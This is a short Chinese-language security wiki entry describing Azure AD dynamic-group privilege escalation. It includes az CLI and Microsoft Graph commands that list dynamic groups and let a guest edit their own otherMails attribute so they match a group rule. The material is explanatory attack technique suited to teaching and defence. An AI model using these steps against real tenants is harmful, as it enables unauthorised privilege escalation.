Az - Dynamic Groups Privesc

基本信息

动态组是配置了一组规则的组，所有符合规则的用户或设备都会被添加到该组。每当用户或设备的属性被更改时，动态规则会被重新检查。当新规则被创建时，所有设备和用户都会被检查。

动态组可以被分配Azure RBAC 角色，但无法将AzureAD 角色添加到动态组。

此功能需要 Azure AD Premium P1 许可证。

权限提升

请注意，默认情况下，任何用户都可以在 Azure AD 中邀请访客，因此，如果动态组的规则根据可以在新访客中设置的属性授予用户权限，则可以创建具有这些属性的访客并提升权限。访客也可以管理自己的个人资料并更改这些属性。

获取允许动态成员资格的组：az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table

示例

• 规则示例：(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")

• 规则描述：任何具有包含字符串 'security' 的次要电子邮件的访客用户将被添加到该组

对于访客用户电子邮件，接受邀请并检查https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView中该用户的当前设置。 不幸的是，该页面不允许修改属性值，因此我们需要使用 API：

# Login with the gust user
az login --allow-no-subscriptions

# Get user object ID
az ad signed-in-user show

# Update otherMails
az rest --method PATCH \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--headers 'Content-Type=application/json' \
--body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'

# Verify the update
az rest --method GET \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--query "otherMails"

参考文献

• https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/